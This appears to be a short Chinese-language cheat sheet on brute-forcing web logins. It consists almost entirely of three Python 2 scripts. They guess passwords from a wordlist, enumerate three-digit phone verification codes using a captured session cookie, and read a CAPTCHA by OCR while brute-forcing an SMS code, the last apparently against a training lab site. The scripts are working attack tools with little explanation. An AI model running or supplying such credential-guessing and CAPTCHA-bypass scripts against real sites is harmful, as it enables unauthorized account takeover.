暴力破解

httplib,urllib

#encoding=utf-8
import httplib,urllib
conn = httplib.HTTPConnection("www.xxx.cn")
f=open("dict.txt")
while 1:
    pwd=f.readline().strip()
    if not pwd:
        print '字典已比对完。'
        break
    params = urllib.urlencode({'username': 'xxx', 'mod': '', 'password': pwd})
    headers = {"Content-type": "application/x-www-form-urlencoded","Accept": "text/plain"}
    conn.request("GET", "/login/aaa.asp", params, headers)
    r = conn.getresponse()
    print r.status, r.reason
    data1 = r.read().decode('gbk')#编码根据实际情况酌情处理
    print data1.index(u'您输入的密码有误'),'您输入的密码\'%s\'有误'%pwd
conn.close()

requests

#!/usr/bin/env python
# -*- coding: gbk -*-
# -*- coding: utf_8 -*-
import requests
header = {'Cookie': 'saeut=218.108.135.246.1416190347811282; PHPSESSID=5f3d9f5685452d1474f59371067e36af'}
    for pwd in xrange(100, 999):
        url = 'www.xxx.cn'
        payload = {'username': 13388886666, 'vcode': pwd}
        r = requests.post(url, data=payload, headers=header, timeout=10)
        response = unicode(r.content, 'utf-8').encode('gbk')
        if 'error' not in response:
            print '正确的验证码为:', pwd, response
            break
        else:
            print '正在尝试手机验证码:', pwd

验证码识别

from pytesser import *
import requests
import os
cur_path = os.getcwd()
vcode_path = os.path.join(cur_path, 'vcode.png')
header = {'Cookie': 'PHPSESSID=896861c59678e89611bb675ff33facb1'}
def vcode():
    pic_url = 'http://lab1.xseclab.com/vcode7_f7947d56f22133dbc85dda4f28530268/vcode.php'
    r = requests.get(pic_url, headers=header)
    with open(vcode_path, 'wb') as pic:
        pic.write(r.content)
    im=Image.open('vcode.png')
    text=image_to_string(im)
    v=text[0:4].replace('O','0').replace('o','0').replace('l','1')
    if len(v)==4 and v.isdigit():
        return v
    else:
        return 0
url = 'http://lab1.xseclab.com/vcode7_f7947d56f22133dbc85dda4f28530268/login.php'
for i in range(100, 1000):
    while 1:
        code = vcode()
        if code:
            break
    data = {'username': '13388886666', 'mobi_code': str(i), 'user_code': code}
    r = requests.post(url, data=data, headers=header, timeout=10)
    print 'm_vode=%s  u_vcode=%s  %s' %(i,code,r.content)